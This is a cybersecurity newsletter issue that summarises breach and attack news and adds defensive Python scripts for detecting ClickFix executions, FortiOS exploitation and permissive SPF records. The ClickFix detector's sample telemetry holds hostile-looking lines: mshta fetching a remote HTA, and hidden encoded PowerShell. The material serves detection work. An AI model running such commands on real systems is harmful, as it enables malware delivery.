Cyber (In)Securities – Issue 119

Information Security News

Google Cloud Links Poor Credentials to Nearly Half of All Cloud-Based Attacks
By Matt Kapko, Cybersecurity Dive
Read more
Google Cloud's threat intelligence team reports that nearly half of the cloud compromises it investigated started with weak, default or already-leaked credentials rather than with a software vulnerability. Attackers log in with passwords reused from earlier breaches, service-account keys left in public repositories and accounts that never had multi-factor authentication, then use over-broad IAM roles to reach data and compute. The practical response is to enforce MFA for every human account, prefer short-lived tokens over long-lived keys, rotate and inventory any keys that must remain, and audit IAM bindings regularly for roles wider than the workload needs. The findings underscore that identity is the control plane of the cloud and deserves the same attention as patching.

Tesla EV Charger Hacked Twice on Second Day of Pwn2Own Tokyo
By Sergiu Gatlan, Bleeping Computer
Read more
On the second day of Pwn2Own Automotive 2025 in Tokyo, two separate teams compromised the Tesla Wall Connector, each demonstrating code execution on the charger through a distinct bug. Under the contest's rules the details go to Tesla through Trend Micro's Zero Day Initiative, which withholds them until the vendor has had time to ship a fix. The results are a reminder that EV chargers sit on home and site networks like any other embedded device and need the same firmware testing, signed updates and network isolation as the rest of that infrastructure.

Patch Now: Cisco Fixes Critical 9.9-Rated, Make-Me-Admin Bug
By Jessica Lyons, The Register
Read more
Cisco has patched a privilege-escalation flaw rated 9.9 out of 10 (CVE-2025-20156) in the REST API of Cisco Meeting Management. Because the API did not properly enforce authorisation, a remote attacker holding any low-privileged account could send crafted requests and obtain administrator control of the edge nodes the product manages. Cisco lists no workaround, so the only fix is to upgrade to a fixed release, and organisations that expose the management interface beyond a trusted admin network should treat this as urgent. The bug is another reminder that authorisation checks on every API route matter as much as authentication at the front door.

Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks
By Ravie Lakshmanan, The Hacker News
Read more
Netskope Threat Labs has tracked a campaign in which fake CAPTCHA pages deliver Lumma Stealer to victims in sectors from finance to healthcare. The pages offer no download: they ask the visitor to "verify" by pressing Windows+R and pasting a command the page has already copied to the clipboard. That command runs mshta.exe against a remote HTA file, which launches PowerShell to fetch and execute the stealer, so the chain begins with a user-typed command rather than a clicked executable. Lumma then harvests browser credentials, cookies, cryptocurrency wallets and other data. Because the first stage is a built-in Windows binary launched from the Run dialog, the useful controls are restricting mshta.exe and PowerShell for ordinary users, alerting on those processes when spawned from explorer.exe with a remote URL, and telling staff that no legitimate CAPTCHA asks them to run a command.
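The process-creation pattern described above is the one thing a defender can alert on regardless of which page or stealer is involved. The check below is an added example, not code from the article or from Netskope: it assumes telemetry shaped like Sysmon Event ID 1 (image, parent image, command line) with the field names used here, and the four sample events are constructed.

```python
"""Flag ClickFix-style executions in Windows process-creation telemetry.

Added example; not from the original article or the researchers it cites.
Assumes records shaped like Sysmon Event ID 1 with the field names below.
The sample events are constructed.
"""
import re

# Living-off-the-land binaries that fake-CAPTCHA pages ask the user to launch.
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Commands typed into the Run dialog (Win+R) are spawned by explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Encoded commands, hidden windows and in-memory execution are the usual tells.
OBFUSCATION_RE = re.compile(
    r"(?i)-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|\biex\b"
    r"|invoke-expression|frombase64string"
)


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event):
    """True when a LOLBin is launched from explorer.exe with a remote URL or obfuscation."""
    child = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    if child not in LOLBIN_CHILDREN or parent not in RUN_DIALOG_PARENTS:
        return False
    return bool(URL_RE.search(cmd) or OBFUSCATION_RE.search(cmd))


def find_clickfix(events):
    """Return the subset of events that match the ClickFix heuristic."""
    return [e for e in events if is_clickfix_like(e)]


# Constructed sample telemetry (hostnames and paths are not real indicators).
SAMPLE_EVENTS = [
    {  # fake CAPTCHA: mshta fetching a remote HTA from the Run dialog
        "image": r"C:\Windows\System32\mshta.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "mshta https://captcha.example.invalid/verify.hta",
    },
    {  # fake CAPTCHA: hidden, base64-encoded PowerShell from the Run dialog
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    },
    {  # benign: scheduled inventory script launched by the task scheduler
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {  # benign: user opens Notepad from the Run dialog
        "image": r"C:\Windows\System32\notepad.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "notepad.exe",
    },
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print("ClickFix-like:", hit["command_line"])
```

Only the first two sample events are flagged. The explorer.exe parent is a heuristic rather than proof that the Run dialog was used; on endpoints where you can also collect registry writes, a matching entry appearing under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU at the same time is strong corroboration that the user typed the command.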

Cloudflare CDN Bug Outs User Locations on Signal, Discord
By Elizabeth Montalbano, Dark Reading
Read more
A researcher showed that Cloudflare's CDN can be used to place users of Signal, Discord and other apps that serve attachments through it to within roughly 250 miles. Cloudflare caches a fetched object at the data centre nearest the client that requested it, and the cf-cache-status and cf-ray response headers reveal whether a copy is cached and which data centre served it. An attacker who sends a target an image, which Signal and Discord clients fetch automatically for previews or push notifications, can then request the same URL from each Cloudflare data centre and see where it is already cached. Cloudflare fixed the Workers bug that let the researcher steer requests to specific data centres, but the cache-location leak itself is a property of edge caching, and Signal and Discord pushed back, treating it as Cloudflare's problem or as outside the app's threat model. Users who need location privacy should route traffic through a VPN and turn off automatic media download and notification previews where the client allows it.

FBI: North Korean IT Workers Steal Source Code to Extort Employers
By Sergiu Gatlan, Bleeping Computer
Read more
The FBI warns that North Korean IT workers hired as remote contractors under false or stolen identities have copied proprietary source code and other data from employers' networks and then held it for ransom, typically after being dismissed or discovered. The advisory recommends applying least privilege to contractor accounts, disabling local administrator rights, monitoring for remote-desktop tools and unusual outbound traffic from contractor machines, and verifying identity during hiring, including insisting on video interviews and checking that shipped laptops go to the address on the contract. The scheme shows that an insider threat can be hired in from outside, which makes access control and monitoring, not just background checks, the durable defences.

New Backdoor Discovered That Specifically Targets Juniper Routers
By Greg Otto, Cyberscoop
Read more
Lumen's Black Lotus Labs has documented J-magic, a backdoor found on enterprise-grade Juniper routers, many of them serving as VPN gateways. The implant is a variant of the cd00r passive backdoor: it opens no listening port but sniffs inbound traffic for a "magic" TCP packet, and only when one arrives does it send the sender an RSA-encrypted challenge and, on a correct reply, open a reverse shell. Because nothing listens until triggered, port scans and service inventories do not reveal it. How the implant was first installed was not established. Operators should look for unexpected processes and binaries on the router, restrict management-plane access to trusted hosts, keep Junos current and alert on outbound connections from devices that should never initiate them.

LinkedIn Sued for Disclosing Customer Information to Train AI Models
By Jonathan Stempel, itNews
Read more
LinkedIn is facing a lawsuit over allegations that it disclosed user data without consent to train artificial intelligence models. Plaintiffs argue that the platform harvested personal information from millions of users to improve AI-driven services, violating privacy rights and data protection laws. The case highlights the growing tension between AI innovation and user privacy, with regulators closely watching the outcome. LinkedIn has denied wrongdoing, but the lawsuit raises concerns about ethical data practices in the AI age.

Crossbenchers Urge Labor to Act Immediately on Deepfakes and Misinformation Before Next Election
By Krishani Dhanji, The Guardian
Read more
Australian crossbench politicians are pressuring the government to implement stricter regulations against deepfakes and misinformation ahead of the next federal election. Lawmakers warn that the rapid spread of AI-generated disinformation could undermine public trust and election integrity. Recommendations include tighter platform regulations, public awareness campaigns, and enhanced fact-checking capabilities. With global elections approaching, the call for immediate action reflects growing concerns over the potential misuse of emerging technologies in shaping public opinion.

EU Commission Calls for Health Sector ‘Cyber Action Plan’
By Marianne Kolbasuk McGee, ISMG Data Breach Today
Read more
The European Commission has urged the healthcare sector to adopt a comprehensive cyber action plan to address the growing threat landscape. With cyberattacks targeting hospitals and medical institutions on the rise, the plan calls for improved incident response, enhanced threat intelligence sharing, and stricter compliance with cybersecurity regulations. The Commission highlights the critical nature of securing healthcare data and infrastructure to protect patient safety and operational continuity.

President Trump Scraps Biden’s AI Safety Executive Order
By Rashmi Ramesh, ISMG Info Risk Today
Read more
On his first day in office, US President Trump rescinded President Biden's October 2023 executive order on AI, citing concerns that it stifled innovation and imposed excessive regulatory burdens. The original order had directed agencies to develop guidance on AI safety testing, reporting of large training runs, bias and accountability. Critics argue that removing it leaves no federal baseline for responsible AI deployment, while supporters say industry-led standards will move faster. The debate highlights the ongoing tension between regulation and innovation in the rapidly evolving AI landscape.

DHS Disbands Existing Advisory Board Memberships, Raising Questions About CSRB
By David Jones, Cybersecurity Dive
Read more
The U.S. Department of Homeland Security has unexpectedly disbanded its advisory board memberships, raising concerns about the future of the Cyber Safety Review Board (CSRB). The move has sparked speculation about potential restructuring and its impact on ongoing cybersecurity initiatives. Industry experts worry that the decision could hinder collaboration between the public and private sectors in addressing cyber threats. DHS officials have assured stakeholders that new appointments will be made, but the shake-up has left many questioning the board’s continuity and long-term strategic direction.

PowerSchool Theft Latest: Decades of Canadian Student Records, Data from 40-Plus US States Feared Stolen
By Iain Thomson, The Register
Read more
A massive data breach involving PowerSchool, a widely used education technology platform, has potentially exposed decades of student records from Canada and over 40 U.S. states. The compromised data includes personal information, academic records, and possibly financial details, raising serious privacy concerns. Authorities are investigating the breach, and affected institutions are urged to enhance their security measures. This incident highlights the vulnerability of educational data and the need for stricter data protection policies.

Ransomware Groups Pose as Fake Tech Support Over Teams
By Derek B. Johnson, Cyberscoop
Read more
Sophos has described two intrusion clusters, with links to the Black Basta ransomware operation, in which attackers first flood a target's inbox with junk mail and then contact them over Microsoft Teams from an attacker-controlled Microsoft 365 tenant named to look like an internal help desk. Posing as IT support fixing the "spam problem", the caller talks the employee into granting remote control through Quick Assist or Teams screen sharing and uses that session to drop malware that gives the attackers a foothold for later ransomware deployment. The technique works because many tenants allow Teams chats and calls from any external domain by default. Sophos recommends restricting external Teams access to known partner domains, disabling or restricting Quick Assist where it is not needed, and telling staff that IT will not initiate unsolicited remote-control sessions.

Trump Fires Cyber Safety Board Investigating Salt Typhoon Hackers
By Becky Bracken, Dark Reading
Read more
US President Trump has reportedly dismissed members of the Cyber Safety Review Board (CSRB) tasked with investigating the Salt Typhoon cyberattacks, raising concerns over the future of cybersecurity governance. The board was analysing the long-term implications of the sophisticated campaign attributed to nation-state actors. Critics argue that the move disrupts critical investigations and weakens national cybersecurity initiatives. The decision has sparked debate over balancing government oversight with independent cybersecurity assessments.

Fake Homebrew Google Ads Target Mac Users With Malware
By Bill Toulas, Bleeping Computer
Read more
A Google ad for Homebrew, the popular macOS package manager, displayed the legitimate brew.sh address but sent clicks to a look-alike domain. The copycat page reproduced Homebrew's one-line "curl | bash" install command with the URL changed, so anyone who pasted it into Terminal pulled down the Atomic (AMOS) macOS infostealer, which targets keychain passwords, browser data and cryptocurrency wallets. Google removed the ad after it was reported. The lesson is that the domain shown in an ad is not the domain you land on: type the address or use a bookmark, check the URL in the install command before running it, and prefer installing developer tooling from a source you have already verified rather than from a search result.

Patch Procrastination Leaves 50,000 Fortinet Firewalls Vulnerable to Zero-Day
By Connor Jones, The Register
Read more
More than a week after Fortinet disclosed CVE-2024-55591, Shadowserver still counts nearly 50,000 exposed Fortinet firewalls that have not been patched. The bug is an authentication bypass in the Node.js websocket module of FortiOS and FortiProxy: an unauthenticated attacker who can reach the administrative interface can obtain super-admin rights. Fortinet confirmed exploitation in the wild, with attackers creating rogue admin accounts, changing firewall policies and logging into the SSL VPN to reach internal networks. Organisations that cannot patch immediately should take the HTTP/HTTPS admin interface off the internet or restrict it to trusted addresses with a local-in policy, and should review logs for admin logins and account additions they did not make. The numbers show that disclosure alone does not close a hole; patching does.
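A practitioner with a possibly exposed firewall wants to know whether it was already used, not only whether it is patched. The scanner below is an added example, not code from The Register or Fortinet. The field names follow the FortiOS key=value event-log format; the indicators it keys on (successful admin logins through the "jsconsole" websocket interface from hosts that are not your admin workstations, and system.admin objects added through that same interface) follow Fortinet's published indicators, which you should confirm against the current advisory before relying on this. The admin allowlist and all log lines are constructed.

```python
"""Scan FortiOS event logs for signs of the FortiOS auth-bypass being used.

Added example; not from The Register or from Fortinet. Field names follow the
FortiOS key=value log format. The indicators mirror Fortinet's published ones
but must be verified against the current advisory. All data here is constructed.
"""
import re

# key=value or key="quoted value" pairs as emitted by FortiOS.
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

# Constructed allowlist: hosts from which legitimate admins use the GUI CLI console.
# The advisory's sample exploitation logins came from addresses such as 127.0.0.1
# and 1.1.1.1, which an allowlist like this would never contain.
ADMIN_HOSTS = {"10.0.0.5"}


def parse_fortios(line):
    """Turn one FortiOS log line into a dict of its key=value fields."""
    fields = {}
    for m in KV_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def classify(fields):
    """Return an indicator label for a parsed line, or None if it looks benign."""
    ui = fields.get("ui", "")
    if (fields.get("logdesc") == "Admin login successful"
            and ui.startswith("jsconsole")
            and fields.get("srcip") not in ADMIN_HOSTS):
        return "jsconsole-login"
    if (fields.get("action") == "Add"
            and fields.get("cfgpath") == "system.admin"
            and ui.startswith("jsconsole")):
        return "admin-added-via-jsconsole"
    return None


def scan(lines):
    """Return (label, user, detail) for every line that matches an indicator."""
    hits = []
    for line in lines:
        f = parse_fortios(line)
        label = classify(f)
        if label:
            hits.append((label, f.get("user"), f.get("cfgobj") or f.get("srcip")))
    return hits


# Constructed log lines in FortiOS format; the account name "xk3pq" is made up.
SAMPLE_LOGS = [
    'date=2025-01-16 time=10:02:11 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" '
    'method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" '
    'profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"',
    'date=2025-01-16 time=10:02:40 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" '
    'action="Add" cfgtid=1234 cfgpath="system.admin" cfgobj="xk3pq" '
    'cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin xk3pq"',
    'date=2025-01-16 time=11:15:03 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Admin login successful" user="admin" ui="GUI(10.0.0.5)" '
    'method="https" srcip=10.0.0.5 dstip=10.0.0.1 action="login" status="success" '
    'profile="super_admin" msg="Administrator admin logged in successfully from https(10.0.0.5)"',
    'date=2025-01-16 time=11:16:30 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="admin" ui="GUI(10.0.0.5)" '
    'action="Add" cfgtid=1235 cfgpath="firewall.policy" cfgobj="42" '
    'cfgattr="name[allow-dns]" msg="Add firewall.policy 42"',
]

if __name__ == "__main__":
    for label, user, detail in scan(SAMPLE_LOGS):
        print(f"{label}: user={user} detail={detail}")
```

Only the first two lines match. Feed the scanner your exported event logs rather than trusting the current admin list on the device: an attacker who gained super-admin can delete the account they created, but the "Add system.admin" event remains in any logs that were forwarded off the box.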

Mirai Botnet Spinoffs Unleash Global Wave of DDoS Attacks
By Elizabeth Montalbano, Dark Reading
Read more
Variants of the infamous Mirai botnet are behind a recent surge in distributed denial-of-service (DDoS) attacks targeting businesses and critical infrastructure worldwide. The spinoffs exploit vulnerable IoT devices, amplifying their reach and impact. Researchers warn that threat actors are refining their tactics, making detection and mitigation increasingly challenging. Organisations are urged to secure IoT deployments and implement robust traffic filtering solutions to mitigate the threat. The attacks serve as a stark reminder of the persistent risks posed by insecure connected devices.

Ransomware Gangs Pose as IT Support in Microsoft Teams Phishing Attacks
By Bill Toulas, Bleeping Computer
Read more
BleepingComputer's account of the same Sophos research adds detail on what follows the fake help-desk call. In one cluster the attacker, once given remote control, ran a Java archive that downloaded Python-based backdoors; in the other, they used the legitimate OneDriveStandaloneUpdater.exe to sideload a malicious winhttp.dll that gave them persistence and a path to the rest of the network. In both cases the employee had been primed by an email bombing that made an urgent IT contact seem plausible. Defences that work here are restricting Teams external federation to named domains, blocking Quick Assist with application control where it has no business use, and monitoring for new DLLs loaded by signed Microsoft binaries from user-writable paths. The attack highlights how far ransomware crews have moved from malicious attachments to direct social engineering.

13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks
By Ravie Lakshmanan, The Hacker News
Read more
Infoblox has tied roughly 13,000 hijacked MikroTik routers to a botnet that relayed malspam: a late-2024 campaign of fake DHL freight invoices carrying a zip with an obfuscated JavaScript file that dropped a trojan. The routers had been configured as SOCKS proxies, letting the operators launder mail and other traffic through them and hiding the true source. The spoofed sender domains, about 20,000 of them, all had SPF records ending in "+all", which tells receiving mail servers that any host on the internet may send for the domain and renders SPF useless. Infoblox could not confirm how the routers were compromised; outdated RouterOS builds and default credentials are the usual suspects. MikroTik owners should update RouterOS, replace default credentials and disable SOCKS and any other service they do not use, and domain owners should check their own SPF records for "+all".
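The "+all" finding is the part of this story a domain owner can check in minutes. The checker below is an added example, not code from The Hacker News or Infoblox: it classifies an SPF record by the qualifier on its final "all" term, using the qualifier meanings from RFC 7208. DNS lookups are replaced by a constructed table of TXT records for made-up domains so it runs offline; swap in a real resolver to check your own zones.

```python
"""Classify SPF records by how much they allow unknown senders to spoof the domain.

Added example; not from the article or from Infoblox. The TXT records below are
constructed for made-up domains. Replace SAMPLE_TXT with real DNS TXT lookups
(for example via dnspython's dns.resolver) to check live zones.
"""
import re

# Constructed TXT records keyed by domain; none of these are real zones.
SAMPLE_TXT = {
    "open.example":     ["v=spf1 include:_spf.mail.example +all"],
    "soft.example":     ["v=spf1 ip4:192.0.2.0/24 ~all"],
    "strict.example":   ["v=spf1 ip4:192.0.2.0/24 -all"],
    "neutral.example":  ["v=spf1 ?all"],
    "nospf.example":    ["some other txt record"],
    "implicit.example": ["v=spf1 ip4:198.51.100.1"],   # no "all" term at all
    "twice.example":    ["v=spf1 -all", "v=spf1 ~all"],  # two records: permerror
}

# RFC 7208 qualifier meanings; a bare "all" is the same as "+all".
QUALIFIER_LABEL = {"+": "open", "-": "fail", "~": "softfail", "?": "neutral"}

# Outcomes under which a receiver will not reject mail from an arbitrary host.
SPOOFABLE = {"no-spf", "multiple-spf", "no-all", "open", "neutral"}


def spf_records(domain, txt_table=SAMPLE_TXT):
    """Return the TXT strings for a domain that are SPF version 1 records."""
    return [r for r in txt_table.get(domain, []) if r.lower().startswith("v=spf1")]


def all_qualifier(record):
    """Return the qualifier ("+", "-", "~", "?") of the first "all" mechanism, or None."""
    for term in record.split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    return None


def assess(domain, txt_table=SAMPLE_TXT):
    """Label a domain's SPF posture from the qualifier on its final "all" term."""
    recs = spf_records(domain, txt_table)
    if not recs:
        return "no-spf"
    if len(recs) > 1:
        return "multiple-spf"   # RFC 7208 requires receivers to treat this as permerror
    q = all_qualifier(recs[0])
    if q is None:
        return "no-all"         # unlisted senders evaluate to neutral
    return QUALIFIER_LABEL[q]


def spoofable(domain, txt_table=SAMPLE_TXT):
    """True when any host on the internet can pass (or not fail) SPF for the domain."""
    return assess(domain, txt_table) in SPOOFABLE


if __name__ == "__main__":
    for d in SAMPLE_TXT:
        print(f"{d:18} {assess(d):12} spoofable={spoofable(d)}")
```

Two limits to keep in mind when you point this at real zones: a record that ends in a redirect= modifier rather than an "all" term defers to the named domain and needs a recursive lookup, and "include:" targets can themselves carry "+all", so a strict "-all" at the top level is only as good as every record it includes.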

Analysis

Ukraine’s State Register Restored After Russian Cyber Attack
By David Hollingworth, Cyberdaily.au
Read more
Ukraine's Ministry of Justice has restored the country's unified state registers following a disruptive cyberattack that officials attributed to Russian-backed hackers. The attack took the registers offline for days, halting services such as property and business registration and the issuance of civil documents. Authorities say the data was recovered from backups and that security measures were reinforced before the registers were brought back, and the methods used are under investigation. The incident shows that for national infrastructure the test is not only keeping attackers out but being able to rebuild quickly from trusted backups when they get in.

EU to Take Aim at Healthcare Cyber Threat
By Karin Lindström, CSO
Read more
The European Union is set to introduce new measures to tackle the growing cybersecurity threats facing the healthcare sector. With a rising number of attacks targeting hospitals and healthcare providers, the initiative aims to establish stronger compliance frameworks, enhance data protection, and improve incident response capabilities. Healthcare organisations are urged to adopt robust cybersecurity measures to safeguard sensitive patient data and ensure continuity of care. The initiative reflects the EU’s commitment to strengthening the security posture of critical sectors.

Cybersecurity a Key Concern Ahead of Australia’s 2025 Federal Election
By David Hollingworth, Cyberdaily
Read more
With Australia’s 2025 federal election approaching, cybersecurity experts are raising alarms about the potential for cyber threats to disrupt the democratic process. Concerns include misinformation campaigns, deepfake technology, and potential attacks on election infrastructure. Lawmakers and cybersecurity agencies are working to strengthen defences, enhance public awareness, and implement regulatory measures to counter these risks. The government is urged to act swiftly to protect voter confidence and ensure election integrity in the face of evolving cyber threats.

CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits
By Ravie Lakshmanan, The Hacker News
Read more
Ukraine's CERT-UA has warned that fraudsters are sending unsolicited AnyDesk connection requests that use the agency's name and logo and claim to be a CERT-UA security audit. Anyone who accepts hands the caller remote control of their machine, which can then be used to steal data or install malware. CERT-UA notes that it does use remote-access tools during genuine incident response, but only by prior agreement through official channels, and that an AnyDesk request can only arrive on a machine where AnyDesk is installed and the sender already knows its ID, so such a request should also prompt the question of how that ID leaked. Organisations should verify any audit request out of band, enable AnyDesk only when a session is actually needed, and restrict it to known partner IDs where the product allows.

HPE is Investigating IntelBroker’s Claims of the Company Hack
By Pierluigi Paganini, Security Affairs
Read more
Hewlett Packard Enterprise (HPE) is investigating claims by the threat actor IntelBroker, who advertised on a criminal forum what they said was data taken from HPE's environment, including source code, private repositories, certificates and some personal information. HPE says it activated its incident response process on learning of the claims and has found no operational impact or evidence that customer data was involved at this stage. IntelBroker has previously posted both genuine and exaggerated hauls, so the claims remain unverified. The case is a reminder that developer infrastructure such as repositories and certificate stores is a high-value target in its own right and deserves the same access controls and monitoring as production.

The Technological Poison Pill: How ATProtocol Encourages Competition, Resists Evil Billionaires, Lock-In & Enshittification
By Mike Masnick, Tech Dirt
Read more
The ATProtocol, designed to decentralise social media and foster competition, presents a compelling solution to the monopolisation of online platforms. This analysis explores how the protocol can combat corporate lock-in, safeguard user data, and resist platform manipulation by powerful interests. While the protocol offers promising solutions, challenges such as adoption hurdles and interoperability remain. The article argues that open, decentralised systems could reshape the digital landscape, providing users with greater control over their online presence.

The Security Risk of Rampant Shadow AI
By Anuj Jaiswal, Dark Reading
Read more
Shadow AI—the unregulated use of artificial intelligence tools within organisations—poses significant security risks, as employees adopt AI solutions without proper oversight. This lack of visibility can lead to data leaks, compliance violations, and vulnerabilities introduced by untested models. The article explores strategies to mitigate these risks, including clear AI governance frameworks, employee training, and continuous monitoring. As AI adoption accelerates, organisations must prioritise security to prevent unintended exposure and potential breaches.

Salt Typhoon: The Other Shoe Has Dropped, but Consternation Continues
By Natto Thoughts, Substack
Read more
The Salt Typhoon cyber espionage campaign continues to raise concerns as new revelations emerge about the depth and scale of the attack. Security experts are scrambling to understand the full extent of data exfiltration and the potential geopolitical implications. This analysis delves into the latest findings and outlines proactive steps organisations can take to strengthen defences against sophisticated nation-state attacks. The article highlights the need for improved threat intelligence sharing and robust incident response planning.

AI and Cybersecurity: A Double-Edged Sword
By Aaron Momin, CIO
Read more
AI is revolutionising cybersecurity by enhancing threat detection and automating responses, but it also introduces new risks that attackers can exploit. This article explores how AI-driven solutions can improve incident response and detection while highlighting the dangers of adversarial AI techniques used to bypass security measures. Organisations must strike a balance between leveraging AI for protection and mitigating its potential misuse. The piece provides practical insights into integrating AI while maintaining a strong human oversight component.

Medusa Ransomware: What You Need To Know
By Graham Cluley, Tripwire
Read more
The Medusa ransomware group has emerged as a formidable threat, targeting businesses and critical infrastructure with sophisticated attacks. Known for encrypting files and demanding steep ransoms, the group has also adopted a double-extortion tactic—leaking stolen data if payments are not made. Security experts advise organisations to strengthen backup strategies, implement multi-layered defences, and conduct regular employee training to mitigate the risk. With ransomware tactics evolving rapidly, businesses must remain vigilant against these persistent threats.

Statistics & Insights

Cyber Market Enters 2025 with Buyer-Friendly Trends – Gallagher
By Kenneth Araullo, Insurance Business
Read more
The cybersecurity insurance market is entering 2025 with trends favouring buyers, as increased competition among insurers drives down premiums and expands coverage options. Companies are now able to negotiate better terms, but insurers are also tightening underwriting standards to ensure policyholders maintain strong security postures. This analysis highlights the evolving risk landscape, emphasising the need for businesses to align their cybersecurity efforts with insurance expectations to secure optimal coverage.

Ransomware, Organisations, Utilities, and Governments
By PrivID, Substack
Read more
Ransomware continues to be a major threat to organisations, utilities, and government entities, with attacks becoming more sophisticated and targeted. This analysis explores how ransomware groups are evolving their tactics, including double extortion and supply chain attacks, putting critical infrastructure at heightened risk. The piece provides actionable insights on how organisations can bolster their defences through proactive risk management, incident response planning, and collaboration with law enforcement agencies to mitigate potential disruptions.

Cyber Insights 2025: Attack Surface Management
By Kevin Townsend, Security Week
Read more
As cyber threats grow in complexity, attack surface management (ASM) is becoming a crucial strategy for organisations to identify and reduce potential entry points for attackers. This analysis examines how ASM tools provide real-time visibility into assets, vulnerabilities, and misconfigurations, helping businesses stay one step ahead of threat actors. With the rapid expansion of cloud services and IoT devices, the need for a proactive, continuous approach to attack surface monitoring has never been greater.

Highlights from Last Week’s Cybersecurity Research Sources by Evisec – CRD #15
Powered by Evisec
Read more
Highlights from the latest cybersecurity research:

  • Cyber Dominates Global Risk Rankings: 38% of global risk managers rank cybersecurity as their top organisational risk, ahead of supply chain interruptions (31%) and natural catastrophes (29%).
  • Resilience Gap Widens: Small organisations report a sevenfold increase in perceived resilience insufficiency since 2022, while large organisations halve theirs.
  • Ransomware Trends Shift: Healthcare is now the second most targeted sector as ransom tactics pivot to data exfiltration. Median ransom payments in 2024 held at $200,000.
  • Infostealers on the Rise: Breach attempts involving infostealer malware surged 58% in 2024, with stolen credentials linked to most breaches.
  • Workplace Fear Culture: 73% of employees feel personally accountable for breaches, with 36% avoiding reporting due to fear of repercussions.

Of Interest

AI Trust and Safety Re-Imagining Programme
Global Call for Submissions – UNDP
Read more
The UNDP is calling for submissions on how to re-imagine trust and safety in the age of AI. This programme aims to address the challenges posed by AI-driven technologies and develop innovative solutions to ensure ethical and responsible use.


CyAN Member’s News

Upcoming CyAN Global Events

  • AI Global Everything – Dubai, UAE (February 4–6)
    Learn more
  • GITEX Africa – Marrakesh, Morocco (April 14–16)
    Learn more
  • GITEX Asia – Singapore, Marina Bay Sands (April 23–25)
    Learn more
  • GISEC – Dubai World Trade Centre, Dubai, UAE (May 6–8)
    Learn more
  • The Cyber Outstanding Security Performance Awards (Cyber OSPAs) – London, UK (May 8)
    Learn more
  • MaTeCC – Rabat, Morocco (June 7–9, 2025)
    The third annual North Africa and Beyond cybersecurity event, hosted by CyAN partner organisation École High-Tech.
    Learn more